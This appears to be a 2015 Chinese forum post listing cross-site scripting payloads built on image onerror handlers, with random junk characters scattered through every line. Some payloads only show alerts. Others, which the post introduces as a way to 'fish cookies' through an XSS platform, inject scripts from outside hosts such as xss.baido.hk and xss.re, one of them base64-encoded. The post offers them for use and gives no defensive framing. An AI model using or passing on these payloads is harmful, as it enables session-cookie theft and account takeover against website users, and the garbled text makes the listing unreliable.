<img src='non-exist.jpg'onerror="alert('xss')">
: b7 p% Z0 V7 w1 k/ | U! x* y5 }! t<img src=# onerror=alert(123)>
9 [8 u6 o& R/ ^; k/ v, n<img src=# onerror=alert(document.cookie)>+ N; f' X) J% G$ h3 f
下面是利用平台钓cookie的
6 }9 R6 B G. L. A <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>: q$ ~& M3 | P3 _. C' s
* s7 P% k6 x. }. d4 j/ Y6 [
6 W2 Z2 v: c) r/ N% u7 Y
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>! Y6 n* ~+ v: c9 D* `4 k( \
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
0 s& ~0 P; p& ?9 w1 y8 z“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>' g- }/ g; s- P) q8 n) j) f
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
4 B" u; H& I& h! U1 P$ D) q( {. q, |<img src="#">
- M( r! r$ \" D/ ^; v<img src="#">0 @: J- m, x, Z" r
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
+ e6 m! s1 _7 d8 Q5 A) R/ m' S<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">! Z1 x/ f; p9 T; N
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
% |7 H$ a/ Q- x- ?<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
' [/ I% d1 a: p0 [" Q3 \<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>* e) i' K8 k6 `
<img src=x width="0" height="0"></img>7 Z: p( A% X/ c3 h* v
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
' X5 @$ `0 k$ t3 h<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>3 u! o0 _" r" R. F2 ]. H, h
|
发表于 2015-10-18 14:33:54
收藏
支持
反对